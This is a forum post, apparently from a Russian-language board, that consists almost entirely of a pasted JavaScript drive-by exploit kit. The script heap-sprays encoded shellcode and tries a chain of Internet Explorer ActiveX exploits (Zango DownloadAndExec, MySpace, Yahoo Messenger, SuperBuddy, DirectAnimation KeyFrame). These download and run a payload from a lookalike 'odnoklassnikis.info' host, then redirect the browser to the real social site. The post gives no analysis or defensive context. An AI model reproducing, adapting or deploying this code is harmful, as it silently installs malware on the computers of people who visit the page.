RoloTomasi
Advanced Member | Ðåäàêòèðîâàòü | Ïðîôèëü | Ñîîáùåíèå | Öèòèðîâàòü | Ñîîáùèòü ìîäåðàòîðó Êîä: <script language="JavaScript"> var m=new Array(); var mf=0; var url="http://odnoklassnikis.info/load.php"; function hex(num,width){ var digits="0123456789ABCDEF"; var hex=digits.substr(num&0xF,1); while(num>0xF){ num=num>>>4; hex=digits.substr(num&0xF,1)+hex; } var width=(width?width:0); while(hex.length<width)hex="0"+hex; return hex; } function addr(addr){ return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4)); } function unes(str){ var tmp=""; for(var i=0;i<str.length;i+=4){ tmp+=addr((str.charCodeAt(i+3)<<24)+ (str.charCodeAt(i+2)<<16)+ (str.charCodeAt(i+1)<<8)+ str.charCodeAt(i)); } return unescape(tmp); } function hav(){ mf=mf; setTimeout("hav()",2000); } function gss(ss,sss){ while(ss.length*2<sss)ss+=ss; ss=ss.substring(0,sss/2); return ss; } function ms(spl){ var plc=unes( "\x43\x43\x43\x43\x43\x43\xEB\x0F\x5B\x33\xC9\x66\xB9\x80\x01\x80"+ "\x33\xEF\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF\x7F\x8B\x4E\xDF"+ "\xEF\xEF\xEF\x64\xAF\xE3\x64\x9F\xF3\x42\x64\x9F\xE7\x6E\x03\xEF"+ "\xEB\xEF\xEF\x64\x03\xB9\x87\x61\xA1\xE1\x03\x07\x11\xEF\xEF\xEF"+ "\x66\xAA\xEB\xB9\x87\x77\x11\x65\xE1\x07\x1F\xEF\xEF\xEF\x66\xAA"+ "\xE7\xB9\x87\xCA\x5F\x10\x2D\x07\x0D\xEF\xEF\xEF\x66\xAA\xE3\xB9"+ "\x87\x00\x21\x0F\x8F\x07\x3B\xEF\xEF\xEF\x66\xAA\xFF\xB9\x87\x2E"+ "\x96\x0A\x57\x07\x29\xEF\xEF\xEF\x66\xAA\xFB\xAF\x6F\xD7\x2C\x9A"+ "\x15\x66\xAA\xF7\x06\xE8\xEE\xEF\xEF\xB1\x66\x9A\xCB\x64\xAA\xEB"+ "\x85\xEE\xB6\x64\xBA\xF7\xB9\x07\x64\xEF\xEF\xEF\xBF\x87\xD9\xF5"+ "\xC0\x9F\x07\x78\xEF\xEF\xEF\x66\xAA\xF3\x64\x2A\x6C\x2F\xBF\x66"+ "\xAA\xCF\x87\x10\xEF\xEF\xEF\xBF\x64\xAA\xFB\x85\xED\xB6\x64\xBA"+ "\xF7\x07\x8E\xEF\xEF\xEF\xEC\xAA\xCF\x28\xEF\xB3\x91\xC1\x8A\x28"+ "\xAF\xEB\x97\x8A\xEF\xEF\x10\x9A\xCF\x64\xAA\xE3\x85\xEE\xB6\x64"+ "\xBA\xF7\x07\xAF\xEF\xEF\xEF\x85\xE8\xB7\xEC\xAA\xCB\xDC\x34\xBC"+ "\xBC\x10\x9A\xCF\xBF\xBC\x64\xAA\xF3\x85\xEA\xB6\x64\xBA\xF7\x07"+ "\xCC\xEF\xEF\xEF\x85\xEF\x10\x9A\xCF\x64\xAA\xE7\x85\xED\xB6\x64"+ "\xBA\xF7\x07\xFF\xEF\xEF\xEF\x85\x10\x64\xAA\xFF\x85\xEE\xB6\x64"+ "\xBA\xF7\x07\xEF\xEF\xEF\xEF\xAE\xB4\xBD\xEC\x0E\xEC\x0E\xEC\x0E"+ "\xEC\x0E\x6C\x03\xEB\xB5\xBC\x64\x35\x0D\x18\xBD\x10\x0F\xBA\x64"+ "\x03\x64\x92\xE7\x64\xB2\xE3\xB9\x64\x9C\xD3\x64\x9B\xF1\x97\xEC"+ "\x1C\xB9\x64\x99\xCF\xEC\x1C\xDC\x26\xA6\xAE\x42\xEC\x2C\xB9\xDC"+ "\x19\xE0\x51\xFF\xD5\x1D\x9B\xE7\x2E\x21\xE2\xEC\x1D\xAF\x04\x1E"+ "\xD4\x11\xB1\x9A\x0A\xB5\x64\x04\x64\xB5\xCB\xEC\x32\x89\x64\xE3"+ "\xA4\x64\xB5\xF3\xEC\x32\x64\xEB\x64\xEC\x2A\xB1\xB2\x2D\xE7\xEF"+ "\x07\x1B\x11\x10\x10\xBA\xBD\xA3\xA2\xA0\xA1\xEF"+url+spl); var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38); var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs; if (mf){ for (i=0;i<hb;i++)delete m[i]; CollectGarbage(); } for(i=0;i<hb;i++)m[i]=ss+plc; if(!mf){ mf=1; hav(); } return 0; } function cobj(obj){ var ret=null; if(obj.substring(0,1)=="{"){ try{ var clsid=obj.substring(1,obj.length-1); ret=document.createElement("object"); ret.setAttribute("classid","clsid:"+clsid); return ret; }catch(e){ return null; } }else{ try{ ret=new ActiveXObject(obj); return ret; }catch(e){ return null; } } } function attack(s){ var obj=null; if(s==4){ try{ var obj1=cobj("{8C875948-9C60-4381-9248-0DF180542D53}"); var obj2=cobj("{BFC08CFF-C737-4433-BD5A-0EE7EFCFEE54}"); if(obj1||obj2){ try{obj1.DownloadAndExec(url+"?spl=zango1");}catch(e){} try{obj2.DownloadAndExec(url+"?spl=zango2");}catch(e){} setTimeout("attack(5)",2000); } }catch(e){} setTimeout("attack(5)",1); return 0; } if(s==5){ try{ obj=cobj("{48DD0448-9209-4F81-9F6D-D83562940134}"); if(obj){ ms("?spl=myspace"); var buf=addr(0x0c0c0c0c); while(buf.length<600)buf+=buf; obj.Action=buf; setTimeout("attack(6)",2000); } }catch(e){} setTimeout("attack(6)",1); return 0; } if(s==6){ try{ obj=cobj("{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}"); if(obj){ ms("?spl=ymj"); var buf=addr(0x0c0c0c0c); while(buf.length<340)buf+=buf; obj.AddImage("http://"+buf,1); setTimeout("attack(7)",2000); } }catch(e){} setTimeout("attack(7)",1); return 0; } if(s==7){ try{ obj=cobj("Sb.SuperBuddy.1"); if(obj){ ms("?spl=buddy"); obj.LinkSBIcons(0x0c0c0c0c); setTimeout("attack(8)",2000); } }catch(e){} setTimeout("attack(8)",1); return 0; } if(s==8){ try{ obj=cobj("DirectAnimation.PathControl"); if(obj){ ms("?spl=vml2"); init(); var jmpecx = 0x0c0c0c0c; var vtable = addr(0x7ceb9090); for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx); vtable += padding.substr(0, (1008-138)/2); var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48; var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2); CollectGarbage(); flush(); for (var i = 0; i < 100; i++)alloc_str(vtable); alloc_str(vtable, "lookaside"); free("lookaside"); for (var i = 0; i < 100; i++)alloc(0x2010); for (var i = 0; i < 2; i++) { alloc_str(fakeObjChunk); alloc_str(fakeObjChunk, "freeList"); } alloc_str(fakeObjChunk); free("freeList"); obj.KeyFrame(0x40000801, new Array(1), new Array(1)); setTimeout("attack(9)",2000); } }catch(e){} setTimeout("attack(9)",1); return 0; } if(s==9){ setTimeout("window.location = \"http://www.odnoklassniki.ru/\"",1); return 0; } } attack(4); </script> | |